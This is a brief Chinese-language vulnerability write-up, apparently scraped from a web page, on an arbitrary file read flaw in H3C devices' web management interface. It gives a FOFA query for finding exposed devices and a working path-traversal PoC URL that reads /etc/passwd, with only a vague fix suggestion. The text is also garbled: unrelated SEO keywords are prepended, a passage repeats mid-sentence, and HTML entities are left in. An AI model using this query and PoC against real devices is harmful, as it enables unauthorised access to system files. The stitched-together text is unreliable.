河北省住房和城市建设厅网站,南宁保洁网站建设,药类网站整站模板下载,网站建设属于什么经济科目Nx01 产品简介 H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作#xff0c;以实现对网络设备的配置、管理和监控。
Nx02 漏洞描述 jquery旧版本存在任意文件读取漏洞#xff0c;允许攻击者在受害者的服务器上读取任意文件。H3…Nx01 产品简介 H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作以实现对网络设备的配置、管理和监控。
Nx02 漏洞描述 jquery旧版本存在任意文件读取漏洞允许攻击者在受害者的服务器上读取任意文件。H3CWeb网管部分使用过时的jquery版本导致存在任意文件读取漏洞。
Nx03 产品主页
fofa-query: body/webui/js/jquerylib/jquery-1.7.2.min.js Nx04 漏洞复现
POC
/webui/?gsys_dia_data_downfile_name../../../../../../../../../../../../etc/passwd Nx05 修复建议
建议联系软件厂商进行处理。
